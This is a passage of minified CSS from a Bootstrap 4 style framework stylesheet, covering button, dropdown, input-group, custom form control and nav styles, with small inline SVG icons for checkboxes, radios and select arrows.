.btn-light:not(:disabled):not(.disabled).active:focus, .show > .btn-light.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(216, 217, 219, 0.5); } .btn-dark { color: #fff; background-color: #343a40; border-color: #343a40; } .btn-dark:hover { color: #fff; background-color: #23272b; border-color: #1d2124; } .btn-dark:focus, .btn-dark.focus { color: #fff; background-color: #23272b; border-color: #1d2124; box-shadow: 0 0 0 0.2rem rgba(82, 88, 93, 0.5); } .btn-dark.disabled, .btn-dark:disabled { color: #fff; background-color: #343a40; border-color: #343a40; } .btn-dark:not(:disabled):not(.disabled):active, .btn-dark:not(:disabled):not(.disabled).active, .show > .btn-dark.dropdown-toggle { color: #fff; background-color: #1d2124; border-color: #171a1d; } .btn-dark:not(:disabled):not(.disabled):active:focus, .btn-dark:not(:disabled):not(.disabled).active:focus, .show > .btn-dark.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(82, 88, 93, 0.5); } .btn-outline-primary { color: #007bff; border-color: #007bff; } .btn-outline-primary:hover { color: #fff; background-color: #007bff; border-color: #007bff; } .btn-outline-primary:focus, .btn-outline-primary.focus { box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.5); } .btn-outline-primary.disabled, .btn-outline-primary:disabled { color: #007bff; background-color: transparent; } .btn-outline-primary:not(:disabled):not(.disabled):active, .btn-outline-primary:not(:disabled):not(.disabled).active, .show > .btn-outline-primary.dropdown-toggle { color: #fff; background-color: #007bff; border-color: #007bff; } .btn-outline-primary:not(:disabled):not(.disabled):active:focus, .btn-outline-primary:not(:disabled):not(.disabled).active:focus, .show > .btn-outline-primary.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.5); } .btn-outline-secondary { color: #6c757d; border-color: #6c757d; } .btn-outline-secondary:hover { color: #fff; background-color: #6c757d; border-color: #6c757d; } .btn-outline-secondary:focus, .btn-outline-secondary.focus { box-shadow: 0 0 0 0.2rem rgba(108, 117, 125, 0.5); } .btn-outline-secondary.disabled, .btn-outline-secondary:disabled { color: #6c757d; background-color: transparent; } .btn-outline-secondary:not(:disabled):not(.disabled):active, .btn-outline-secondary:not(:disabled):not(.disabled).active, .show > .btn-outline-secondary.dropdown-toggle { color: #fff; background-color: #6c757d; border-color: #6c757d; } .btn-outline-secondary:not(:disabled):not(.disabled):active:focus, .btn-outline-secondary:not(:disabled):not(.disabled).active:focus, .show > .btn-outline-secondary.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(108, 117, 125, 0.5); } .btn-outline-success { color: #28a745; border-color: #28a745; } .btn-outline-success:hover { color: #fff; background-color: #28a745; border-color: #28a745; } .btn-outline-success:focus, .btn-outline-success.focus { box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.5); } .btn-outline-success.disabled, .btn-outline-success:disabled { color: #28a745; background-color: transparent; } .btn-outline-success:not(:disabled):not(.disabled):active, .btn-outline-success:not(:disabled):not(.disabled).active, .show > .btn-outline-success.dropdown-toggle { color: #fff; background-color: #28a745; border-color: #28a745; } .btn-outline-success:not(:disabled):not(.disabled):active:focus, .btn-outline-success:not(:disabled):not(.disabled).active:focus, .show > .btn-outline-success.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.5); } .btn-outline-info { color: #17a2b8; border-color: #17a2b8; } .btn-outline-info:hover { color: #fff; background-color: #17a2b8; border-color: #17a2b8; } .btn-outline-info:focus, .btn-outline-info.focus { box-shadow: 0 0 0 0.2rem rgba(23, 162, 184, 0.5); } .btn-outline-info.disabled, .btn-outline-info:disabled { color: #17a2b8; background-color: transparent; } .btn-outline-info:not(:disabled):not(.disabled):active, .btn-outline-info:not(:disabled):not(.disabled).active, .show > .btn-outline-info.dropdown-toggle { color: #fff; background-color: #17a2b8; border-color: #17a2b8; } .btn-outline-info:not(:disabled):not(.disabled):active:focus, .btn-outline-info:not(:disabled):not(.disabled).active:focus, .show > .btn-outline-info.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(23, 162, 184, 0.5); } .btn-outline-warning { color: #ffc107; border-color: #ffc107; } .btn-outline-warning:hover { color: #212529; background-color: #ffc107; border-color: #ffc107; } .btn-outline-warning:focus, .btn-outline-warning.focus { box-shadow: 0 0 0 0.2rem rgba(255, 193, 7, 0.5); } .btn-outline-warning.disabled, .btn-outline-warning:disabled { color: #ffc107; background-color: transparent; } .btn-outline-warning:not(:disabled):not(.disabled):active, .btn-outline-warning:not(:disabled):not(.disabled).active, .show > .btn-outline-warning.dropdown-toggle { color: #212529; background-color: #ffc107; border-color: #ffc107; } .btn-outline-warning:not(:disabled):not(.disabled):active:focus, .btn-outline-warning:not(:disabled):not(.disabled).active:focus, .show > .btn-outline-warning.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(255, 193, 7, 0.5); } .btn-outline-danger { color: #dc3545; border-color: #dc3545; } .btn-outline-danger:hover { color: #fff; background-color: #dc3545; border-color: #dc3545; } .btn-outline-danger:focus, .btn-outline-danger.focus { box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.5); } .btn-outline-danger.disabled, .btn-outline-danger:disabled { color: #dc3545; background-color: transparent; } .btn-outline-danger:not(:disabled):not(.disabled):active, .btn-outline-danger:not(:disabled):not(.disabled).active, .show > .btn-outline-danger.dropdown-toggle { color: #fff; background-color: #dc3545; border-color: #dc3545; } .btn-outline-danger:not(:disabled):not(.disabled):active:focus, .btn-outline-danger:not(:disabled):not(.disabled).active:focus, .show > .btn-outline-danger.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.5); } .btn-outline-light { color: #f8f9fa; border-color: #f8f9fa; } .btn-outline-light:hover { color: #212529; background-color: #f8f9fa; border-color: #f8f9fa; } .btn-outline-light:focus, .btn-outline-light.focus { box-shadow: 0 0 0 0.2rem rgba(248, 249, 250, 0.5); } .btn-outline-light.disabled, .btn-outline-light:disabled { color: #f8f9fa; background-color: transparent; } .btn-outline-light:not(:disabled):not(.disabled):active, .btn-outline-light:not(:disabled):not(.disabled).active, .show > .btn-outline-light.dropdown-toggle { color: #212529; background-color: #f8f9fa; border-color: #f8f9fa; } .btn-outline-light:not(:disabled):not(.disabled):active:focus, .btn-outline-light:not(:disabled):not(.disabled).active:focus, .show > .btn-outline-light.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(248, 249, 250, 0.5); } .btn-outline-dark { color: #343a40; border-color: #343a40; } .btn-outline-dark:hover { color: #fff; background-color: #343a40; border-color: #343a40; } .btn-outline-dark:focus, .btn-outline-dark.focus { box-shadow: 0 0 0 0.2rem rgba(52, 58, 64, 0.5); } .btn-outline-dark.disabled, .btn-outline-dark:disabled { color: #343a40; background-color: transparent; } .btn-outline-dark:not(:disabled):not(.disabled):active, .btn-outline-dark:not(:disabled):not(.disabled).active, .show > .btn-outline-dark.dropdown-toggle { color: #fff; background-color: #343a40; border-color: #343a40; } .btn-outline-dark:not(:disabled):not(.disabled):active:focus, .btn-outline-dark:not(:disabled):not(.disabled).active:focus, .show > .btn-outline-dark.dropdown-toggle:focus { box-shadow: 0 0 0 0.2rem rgba(52, 58, 64, 0.5); } .btn-link { font-weight: 400; color: #007bff; text-decoration: none; } .btn-link:hover { color: #0056b3; text-decoration: underline; } .btn-link:focus, .btn-link.focus { text-decoration: underline; box-shadow: none; } .btn-link:disabled, .btn-link.disabled { color: #6c757d; pointer-events: none; } .btn-lg, .btn-group-lg > .btn { padding: 0.5rem 1rem; font-size: 1.25rem; line-height: 1.5; border-radius: 0.3rem; } .btn-sm, .btn-group-sm > .btn { padding: 0.25rem 0.5rem; font-size: 0.875rem; line-height: 1.5; border-radius: 0.2rem; } .btn-block { display: block; width: 100%; } .btn-block + .btn-block { margin-top: 0.5rem; } input[type="submit"].btn-block, input[type="reset"].btn-block, input[type="button"].btn-block { width: 100%; } .fade { transition: opacity 0.15s linear; } @media (prefers-reduced-motion: reduce) { .fade { transition: none; } } .fade:not(.show) { opacity: 0; } .collapse:not(.show) { display: none; } .collapsing { position: relative; height: 0; overflow: hidden; transition: height 0.35s ease; } @media (prefers-reduced-motion: reduce) { .collapsing { transition: none; } } .dropup, .dropright, .dropdown, .dropleft { position: relative; } .dropdown-toggle { white-space: nowrap; } .dropdown-toggle::after { display: inline-block; margin-left: 0.255em; vertical-align: 0.255em; content: ""; border-top: 0.3em solid; border-right: 0.3em solid transparent; border-bottom: 0; border-left: 0.3em solid transparent; } .dropdown-toggle:empty::after { margin-left: 0; } .dropdown-menu { position: absolute; top: 100%; left: 0; z-index: 1000; display: none; float: left; min-width: 10rem; padding: 0.5rem 0; margin: 0.125rem 0 0; font-size: 1rem; color: #212529; text-align: left; list-style: none; background-color: #fff; background-clip: padding-box; border: 1px solid rgba(0, 0, 0, 0.15); border-radius: 0.25rem; } .dropdown-menu-left { right: auto; left: 0; } .dropdown-menu-right { right: 0; left: auto; } @media (min-width: 576px) { .dropdown-menu-sm-left { right: auto; left: 0; } .dropdown-menu-sm-right { right: 0; left: auto; } } @media (min-width: 768px) { .dropdown-menu-md-left { right: auto; left: 0; } .dropdown-menu-md-right { right: 0; left: auto; } } @media (min-width: 992px) { .dropdown-menu-lg-left { right: auto; left: 0; } .dropdown-menu-lg-right { right: 0; left: auto; } } @media (min-width: 1200px) { .dropdown-menu-xl-left { right: auto; left: 0; } .dropdown-menu-xl-right { right: 0; left: auto; } } .dropup .dropdown-menu { top: auto; bottom: 100%; margin-top: 0; margin-bottom: 0.125rem; } .dropup .dropdown-toggle::after { display: inline-block; margin-left: 0.255em; vertical-align: 0.255em; content: ""; border-top: 0; border-right: 0.3em solid transparent; border-bottom: 0.3em solid; border-left: 0.3em solid transparent; } .dropup .dropdown-toggle:empty::after { margin-left: 0; } .dropright .dropdown-menu { top: 0; right: auto; left: 100%; margin-top: 0; margin-left: 0.125rem; } .dropright .dropdown-toggle::after { display: inline-block; margin-left: 0.255em; vertical-align: 0.255em; content: ""; border-top: 0.3em solid transparent; border-right: 0; border-bottom: 0.3em solid transparent; border-left: 0.3em solid; } .dropright .dropdown-toggle:empty::after { margin-left: 0; } .dropright .dropdown-toggle::after { vertical-align: 0; } .dropleft .dropdown-menu { top: 0; right: 100%; left: auto; margin-top: 0; margin-right: 0.125rem; } .dropleft .dropdown-toggle::after { display: inline-block; margin-left: 0.255em; vertical-align: 0.255em; content: ""; } .dropleft .dropdown-toggle::after { display: none; } .dropleft .dropdown-toggle::before { display: inline-block; margin-right: 0.255em; vertical-align: 0.255em; content: ""; border-top: 0.3em solid transparent; border-right: 0.3em solid; border-bottom: 0.3em solid transparent; } .dropleft .dropdown-toggle:empty::after { margin-left: 0; } .dropleft .dropdown-toggle::before { vertical-align: 0; } .dropdown-menu[x-placement^="top"], .dropdown-menu[x-placement^="right"], .dropdown-menu[x-placement^="bottom"], .dropdown-menu[x-placement^="left"] { right: auto; bottom: auto; } .dropdown-divider { height: 0; margin: 0.5rem 0; overflow: hidden; border-top: 1px solid #e9ecef; } .dropdown-item { display: block; width: 100%; padding: 0.25rem 1.5rem; clear: both; font-weight: 400; color: #212529; text-align: inherit; white-space: nowrap; background-color: transparent; border: 0; } .dropdown-item:hover, .dropdown-item:focus { color: #16181b; text-decoration: none; background-color: #f8f9fa; } .dropdown-item.active, .dropdown-item:active { color: #fff; text-decoration: none; background-color: #007bff; } .dropdown-item.disabled, .dropdown-item:disabled { color: #6c757d; pointer-events: none; background-color: transparent; } .dropdown-menu.show { display: block; } .dropdown-header { display: block; padding: 0.5rem 1.5rem; margin-bottom: 0; font-size: 0.875rem; color: #6c757d; white-space: nowrap; } .dropdown-item-text { display: block; padding: 0.25rem 1.5rem; color: #212529; } .btn-group, .btn-group-vertical { position: relative; display: -ms-inline-flexbox; display: inline-flex; vertical-align: middle; } .btn-group > .btn, .btn-group-vertical > .btn { position: relative; -ms-flex: 1 1 auto; flex: 1 1 auto; } .btn-group > .btn:hover, .btn-group-vertical > .btn:hover { z-index: 1; } .btn-group > .btn:focus, .btn-group > .btn:active, .btn-group > .btn.active, .btn-group-vertical > .btn:focus, .btn-group-vertical > .btn:active, .btn-group-vertical > .btn.active { z-index: 1; } .btn-toolbar { display: -ms-flexbox; display: flex; -ms-flex-wrap: wrap; flex-wrap: wrap; -ms-flex-pack: start; justify-content: flex-start; } .btn-toolbar .input-group { width: auto; } .btn-group > .btn:not(:first-child), .btn-group > .btn-group:not(:first-child) { margin-left: -1px; } .btn-group > .btn:not(:last-child):not(.dropdown-toggle), .btn-group > .btn-group:not(:last-child) > .btn { border-top-right-radius: 0; border-bottom-right-radius: 0; } .btn-group > .btn:not(:first-child), .btn-group > .btn-group:not(:first-child) > .btn { border-top-left-radius: 0; border-bottom-left-radius: 0; } .dropdown-toggle-split { padding-right: 0.5625rem; padding-left: 0.5625rem; } .dropdown-toggle-split::after, .dropup .dropdown-toggle-split::after, .dropright .dropdown-toggle-split::after { margin-left: 0; } .dropleft .dropdown-toggle-split::before { margin-right: 0; } .btn-sm + .dropdown-toggle-split, .btn-group-sm > .btn + .dropdown-toggle-split { padding-right: 0.375rem; padding-left: 0.375rem; } .btn-lg + .dropdown-toggle-split, .btn-group-lg > .btn + .dropdown-toggle-split { padding-right: 0.75rem; padding-left: 0.75rem; } .btn-group-vertical { -ms-flex-direction: column; flex-direction: column; -ms-flex-align: start; align-items: flex-start; -ms-flex-pack: center; justify-content: center; } .btn-group-vertical > .btn, .btn-group-vertical > .btn-group { width: 100%; } .btn-group-vertical > .btn:not(:first-child), .btn-group-vertical > .btn-group:not(:first-child) { margin-top: -1px; } .btn-group-vertical > .btn:not(:last-child):not(.dropdown-toggle), .btn-group-vertical > .btn-group:not(:last-child) > .btn { border-bottom-right-radius: 0; border-bottom-left-radius: 0; } .btn-group-vertical > .btn:not(:first-child), .btn-group-vertical > .btn-group:not(:first-child) > .btn { border-top-left-radius: 0; border-top-right-radius: 0; } .btn-group-toggle > .btn, .btn-group-toggle > .btn-group > .btn { margin-bottom: 0; } .btn-group-toggle > .btn input[type="radio"], .btn-group-toggle > .btn input[type="checkbox"], .btn-group-toggle > .btn-group > .btn input[type="radio"], .btn-group-toggle > .btn-group > .btn input[type="checkbox"] { position: absolute; clip: rect(0, 0, 0, 0); pointer-events: none; } .input-group { position: relative; display: -ms-flexbox; display: flex; -ms-flex-wrap: wrap; flex-wrap: wrap; -ms-flex-align: stretch; align-items: stretch; width: 100%; } .input-group > .form-control, .input-group > .form-control-plaintext, .input-group > .custom-select, .input-group > .custom-file { position: relative; -ms-flex: 1 1 0%; flex: 1 1 0%; min-width: 0; margin-bottom: 0; } .input-group > .form-control + .form-control, .input-group > .form-control + .custom-select, .input-group > .form-control + .custom-file, .input-group > .form-control-plaintext + .form-control, .input-group > .form-control-plaintext + .custom-select, .input-group > .form-control-plaintext + .custom-file, .input-group > .custom-select + .form-control, .input-group > .custom-select + .custom-select, .input-group > .custom-select + .custom-file, .input-group > .custom-file + .form-control, .input-group > .custom-file + .custom-select, .input-group > .custom-file + .custom-file { margin-left: -1px; } .input-group > .form-control:focus, .input-group > .custom-select:focus, .input-group > .custom-file .custom-file-input:focus ~ .custom-file-label { z-index: 3; } .input-group > .custom-file .custom-file-input:focus { z-index: 4; } .input-group > .form-control:not(:last-child), .input-group > .custom-select:not(:last-child) { border-top-right-radius: 0; border-bottom-right-radius: 0; } .input-group > .form-control:not(:first-child), .input-group > .custom-select:not(:first-child) { border-top-left-radius: 0; border-bottom-left-radius: 0; } .input-group > .custom-file { display: -ms-flexbox; display: flex; -ms-flex-align: center; align-items: center; } .input-group > .custom-file:not(:last-child) .custom-file-label, .input-group > .custom-file:not(:last-child) .custom-file-label::after { border-top-right-radius: 0; border-bottom-right-radius: 0; } .input-group > .custom-file:not(:first-child) .custom-file-label { border-top-left-radius: 0; border-bottom-left-radius: 0; } .input-group-prepend, .input-group-append { display: -ms-flexbox; display: flex; } .input-group-prepend .btn, .input-group-append .btn { position: relative; z-index: 2; } .input-group-prepend .btn:focus, .input-group-append .btn:focus { z-index: 3; } .input-group-prepend .btn + .btn, .input-group-prepend .btn + .input-group-text, .input-group-prepend .input-group-text + .input-group-text, .input-group-prepend .input-group-text + .btn, .input-group-append .btn + .btn, .input-group-append .btn + .input-group-text, .input-group-append .input-group-text + .input-group-text, .input-group-append .input-group-text + .btn { margin-left: -1px; } .input-group-prepend { margin-right: -1px; } .input-group-append { margin-left: -1px; } .input-group-text { display: -ms-flexbox; display: flex; -ms-flex-align: center; align-items: center; padding: 0.375rem 0.75rem; margin-bottom: 0; font-size: 1rem; font-weight: 400; line-height: 1.5; color: #495057; text-align: center; white-space: nowrap; background-color: #e9ecef; border: 1px solid #ced4da; border-radius: 0.25rem; } .input-group-text input[type="radio"], .input-group-text input[type="checkbox"] { margin-top: 0; } .input-group-lg > .form-control:not(textarea), .input-group-lg > .custom-select { height: calc(1.5em + 1rem + 2px); } .input-group-lg > .form-control, .input-group-lg > .custom-select, .input-group-lg > .input-group-prepend > .input-group-text, .input-group-lg > .input-group-append > .input-group-text, .input-group-lg > .input-group-prepend > .btn, .input-group-lg > .input-group-append > .btn { padding: 0.5rem 1rem; font-size: 1.25rem; line-height: 1.5; border-radius: 0.3rem; } .input-group-sm > .form-control:not(textarea), .input-group-sm > .custom-select { height: calc(1.5em + 0.5rem + 2px); } .input-group-sm > .form-control, .input-group-sm > .custom-select, .input-group-sm > .input-group-prepend > .input-group-text, .input-group-sm > .input-group-append > .input-group-text, .input-group-sm > .input-group-prepend > .btn, .input-group-sm > .input-group-append > .btn { padding: 0.25rem 0.5rem; font-size: 0.875rem; line-height: 1.5; border-radius: 0.2rem; } .input-group-lg > .custom-select, .input-group-sm > .custom-select { padding-right: 1.75rem; } .input-group > .input-group-prepend > .btn, .input-group > .input-group-prepend > .input-group-text, .input-group > .input-group-append:not(:last-child) > .btn, .input-group > .input-group-append:not(:last-child) > .input-group-text, .input-group > .input-group-append:last-child > .btn:not(:last-child):not(.dropdown-toggle), .input-group > .input-group-append:last-child > .input-group-text:not(:last-child) { border-top-right-radius: 0; border-bottom-right-radius: 0; } .input-group > .input-group-append > .btn, .input-group > .input-group-append > .input-group-text, .input-group > .input-group-prepend:not(:first-child) > .btn, .input-group > .input-group-prepend:not(:first-child) > .input-group-text, .input-group > .input-group-prepend:first-child > .btn:not(:first-child), .input-group > .input-group-prepend:first-child > .input-group-text:not(:first-child) { border-top-left-radius: 0; border-bottom-left-radius: 0; } .custom-control { position: relative; display: block; min-height: 1.5rem; padding-left: 1.5rem; } .custom-control-inline { display: -ms-inline-flexbox; display: inline-flex; margin-right: 1rem; } .custom-control-input { position: absolute; left: 0; z-index: -1; width: 1rem; height: 1.25rem; opacity: 0; } .custom-control-input:checked ~ .custom-control-label::before { color: #fff; border-color: #007bff; background-color: #007bff; } .custom-control-input:focus ~ .custom-control-label::before { box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.25); } .custom-control-input:focus:not(:checked) ~ .custom-control-label::before { border-color: #80bdff; } .custom-control-input:not(:disabled):active ~ .custom-control-label::before { color: #fff; background-color: #b3d7ff; border-color: #b3d7ff; } .custom-control-input[disabled] ~ .custom-control-label, .custom-control-input:disabled ~ .custom-control-label { color: #6c757d; } .custom-control-input[disabled] ~ .custom-control-label::before, .custom-control-input:disabled ~ .custom-control-label::before { background-color: #e9ecef; } .custom-control-label { position: relative; margin-bottom: 0; vertical-align: top; } .custom-control-label::before { position: absolute; top: 0.25rem; left: -1.5rem; display: block; width: 1rem; height: 1rem; pointer-events: none; content: ""; background-color: #fff; border: #adb5bd solid 1px; } .custom-control-label::after { position: absolute; top: 0.25rem; left: -1.5rem; display: block; width: 1rem; height: 1rem; content: ""; background: no-repeat 50% / 50% 50%; } .custom-checkbox .custom-control-label::before { border-radius: 0.25rem; } .custom-checkbox .custom-control-input:checked ~ .custom-control-label::after { background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='8' height='8' viewBox='0 0 8 8'%3e%3cpath fill='%23fff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26l2.974 2.99L8 2.193z'/%3e%3c/svg%3e"); } .custom-checkbox .custom-control-input:indeterminate ~ .custom-control-label::before { border-color: #007bff; background-color: #007bff; } .custom-checkbox .custom-control-input:indeterminate ~ .custom-control-label::after { background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='4' height='4' viewBox='0 0 4 4'%3e%3cpath stroke='%23fff' d='M0 2h4'/%3e%3c/svg%3e"); } .custom-checkbox .custom-control-input:disabled:checked ~ .custom-control-label::before { background-color: rgba(0, 123, 255, 0.5); } .custom-checkbox .custom-control-input:disabled:indeterminate ~ .custom-control-label::before { background-color: rgba(0, 123, 255, 0.5); } .custom-radio .custom-control-label::before { border-radius: 50%; } .custom-radio .custom-control-input:checked ~ .custom-control-label::after { background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='12' height='12' viewBox='-4 -4 8 8'%3e%3ccircle r='3' fill='%23fff'/%3e%3c/svg%3e"); } .custom-radio .custom-control-input:disabled:checked ~ .custom-control-label::before { background-color: rgba(0, 123, 255, 0.5); } .custom-switch { padding-left: 2.25rem; } .custom-switch .custom-control-label::before { left: -2.25rem; width: 1.75rem; pointer-events: all; border-radius: 0.5rem; } .custom-switch .custom-control-label::after { top: calc(0.25rem + 2px); left: calc(-2.25rem + 2px); width: calc(1rem - 4px); height: calc(1rem - 4px); background-color: #adb5bd; border-radius: 0.5rem; transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out, -webkit-transform 0.15s ease-in-out; transition: transform 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out; transition: transform 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out, -webkit-transform 0.15s ease-in-out; } @media (prefers-reduced-motion: reduce) { .custom-switch .custom-control-label::after { transition: none; } } .custom-switch .custom-control-input:checked ~ .custom-control-label::after { background-color: #fff; -webkit-transform: translateX(0.75rem); transform: translateX(0.75rem); } .custom-switch .custom-control-input:disabled:checked ~ .custom-control-label::before { background-color: rgba(0, 123, 255, 0.5); } .custom-select { display: inline-block; width: 100%; height: calc(1.5em + 0.75rem + 2px); padding: 0.375rem 1.75rem 0.375rem 0.75rem; font-size: 1rem; font-weight: 400; line-height: 1.5; color: #495057; vertical-align: middle; background: #fff url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='4' height='5' viewBox='0 0 4 5'%3e%3cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e") no-repeat right 0.75rem center/8px 10px; border: 1px solid #ced4da; border-radius: 0.25rem; -webkit-appearance: none; -moz-appearance: none; appearance: none; } .custom-select:focus { border-color: #80bdff; outline: 0; box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.25); } .custom-select:focus::-ms-value { color: #495057; background-color: #fff; } .custom-select[multiple], .custom-select[size]:not([size="1"]) { height: auto; padding-right: 0.75rem; background-image: none; } .custom-select:disabled { color: #6c757d; background-color: #e9ecef; } .custom-select::-ms-expand { display: none; } .custom-select:-moz-focusring { color: transparent; text-shadow: 0 0 0 #495057; } .custom-select-sm { height: calc(1.5em + 0.5rem + 2px); padding-top: 0.25rem; padding-bottom: 0.25rem; padding-left: 0.5rem; font-size: 0.875rem; } .custom-select-lg { height: calc(1.5em + 1rem + 2px); padding-top: 0.5rem; padding-bottom: 0.5rem; padding-left: 1rem; font-size: 1.25rem; } .custom-file { position: relative; display: inline-block; width: 100%; height: calc(1.5em + 0.75rem + 2px); margin-bottom: 0; } .custom-file-input { position: relative; z-index: 2; width: 100%; height: calc(1.5em + 0.75rem + 2px); margin: 0; opacity: 0; } .custom-file-input:focus ~ .custom-file-label { border-color: #80bdff; box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.25); } .custom-file-input[disabled] ~ .custom-file-label, .custom-file-input:disabled ~ .custom-file-label { background-color: #e9ecef; } .custom-file-input:lang(en) ~ .custom-file-label::after { content: "Browse"; } .custom-file-input ~ .custom-file-label[data-browse]::after { content: attr(data-browse); } .custom-file-label { position: absolute; top: 0; right: 0; left: 0; z-index: 1; height: calc(1.5em + 0.75rem + 2px); padding: 0.375rem 0.75rem; font-weight: 400; line-height: 1.5; color: #495057; background-color: #fff; border: 1px solid #ced4da; border-radius: 0.25rem; } .custom-file-label::after { position: absolute; top: 0; right: 0; bottom: 0; z-index: 3; display: block; height: calc(1.5em + 0.75rem); padding: 0.375rem 0.75rem; line-height: 1.5; color: #495057; content: "Browse"; background-color: #e9ecef; border-left: inherit; border-radius: 0 0.25rem 0.25rem 0; } .custom-range { width: 100%; height: 1.4rem; padding: 0; background-color: transparent; -webkit-appearance: none; -moz-appearance: none; appearance: none; } .custom-range:focus { outline: none; } .custom-range:focus::-webkit-slider-thumb { box-shadow: 0 0 0 1px #fff, 0 0 0 0.2rem rgba(0, 123, 255, 0.25); } .custom-range:focus::-moz-range-thumb { box-shadow: 0 0 0 1px #fff, 0 0 0 0.2rem rgba(0, 123, 255, 0.25); } .custom-range:focus::-ms-thumb { box-shadow: 0 0 0 1px #fff, 0 0 0 0.2rem rgba(0, 123, 255, 0.25); } .custom-range::-moz-focus-outer { border: 0; } .custom-range::-webkit-slider-thumb { width: 1rem; height: 1rem; margin-top: -0.25rem; background-color: #007bff; border: 0; border-radius: 1rem; -webkit-transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out; transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out; -webkit-appearance: none; appearance: none; } @media (prefers-reduced-motion: reduce) { .custom-range::-webkit-slider-thumb { -webkit-transition: none; transition: none; } } .custom-range::-webkit-slider-thumb:active { background-color: #b3d7ff; } .custom-range::-webkit-slider-runnable-track { width: 100%; height: 0.5rem; color: transparent; cursor: pointer; background-color: #dee2e6; border-color: transparent; border-radius: 1rem; } .custom-range::-moz-range-thumb { width: 1rem; height: 1rem; background-color: #007bff; border: 0; border-radius: 1rem; -moz-transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out; transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out; -moz-appearance: none; appearance: none; } @media (prefers-reduced-motion: reduce) { .custom-range::-moz-range-thumb { -moz-transition: none; transition: none; } } .custom-range::-moz-range-thumb:active { background-color: #b3d7ff; } .custom-range::-moz-range-track { width: 100%; height: 0.5rem; color: transparent; cursor: pointer; background-color: #dee2e6; border-color: transparent; border-radius: 1rem; } .custom-range::-ms-thumb { width: 1rem; height: 1rem; margin-top: 0; margin-right: 0.2rem; margin-left: 0.2rem; background-color: #007bff; border: 0; border-radius: 1rem; -ms-transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out; transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out; appearance: none; } @media (prefers-reduced-motion: reduce) { .custom-range::-ms-thumb { -ms-transition: none; transition: none; } } .custom-range::-ms-thumb:active { background-color: #b3d7ff; } .custom-range::-ms-track { width: 100%; height: 0.5rem; color: transparent; cursor: pointer; background-color: transparent; border-color: transparent; border-width: 0.5rem; } .custom-range::-ms-fill-lower { background-color: #dee2e6; border-radius: 1rem; } .custom-range::-ms-fill-upper { margin-right: 15px; background-color: #dee2e6; border-radius: 1rem; } .custom-range:disabled::-webkit-slider-thumb { background-color: #adb5bd; } .custom-range:disabled::-webkit-slider-runnable-track { cursor: default; } .custom-range:disabled::-moz-range-thumb { background-color: #adb5bd; } .custom-range:disabled::-moz-range-track { cursor: default; } .custom-range:disabled::-ms-thumb { background-color: #adb5bd; } .custom-control-label::before, .custom-file-label, .custom-select { transition: background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out; } @media (prefers-reduced-motion: reduce) { .custom-control-label::before, .custom-file-label, .custom-select { transition: none; } } .nav { display: -ms-flexbox; display: flex; -ms-flex-wrap: wrap; flex-wrap: wrap; padding-left: 0; margin-bottom: 0; list-style: none; } .nav-link { display: block; padding: 0.5rem 1rem; } .nav-link:hover, .nav-link:focus { text-decoration: none; } .nav-link.disabled { color: #6c757d; pointer-events: none; cursor: default; } .nav-tabs { border-bottom: 1px solid #dee2e6; } .nav-tabs .nav-item { margin-bottom: -1px; } .nav-tabs .nav-link { border: 1px solid transparent; border-top-left-radius: 0.25rem; border-top-right-radius: 0.25rem; } .nav-tabs .nav-link:hover, .nav-tabs .nav-link:focus { border-color: #e9ecef #e9ecef #dee2e6; } .nav-tabs .nav-link.disabled { color: #6c757d; background-color: transparent; border-color: transparent; } .nav-tabs .nav-link.active, .nav-tabs .nav-item.show .nav-link { color: #495057; background-color: #fff; border-color: #dee2e6 #dee2e6 #fff; } .nav-tabs .dropdown-menu { margin-top: -1px; border-top-left-radius: 0; border-top-right-radius: 0; } .nav-pills .nav-link { border-radius: 0.25rem; } .nav-pills .nav-link.active, .nav-pills .show > .nav-link { color: #fff; background-color: #007bff; } .nav-fill .nav-item { -ms-flex: 1 1 auto; flex: 1 1 auto; text-align: center; } .nav-justified .nav-item { -ms-flex-preferred-size: 0; flex-basis: 0; -ms-flex-positive: 1; flex-grow: 1; text-align: center; } .tab-content > .tab-pane { display: none; } .tab-content > .active { display: block; } .navbar { position: relative; display: -ms-flexbox; display: flex; -ms-flex-wrap: wrap; flex-wrap: wrap; -ms-flex-align: center; align-items: center; -ms-flex-pack: justify; justify-content: 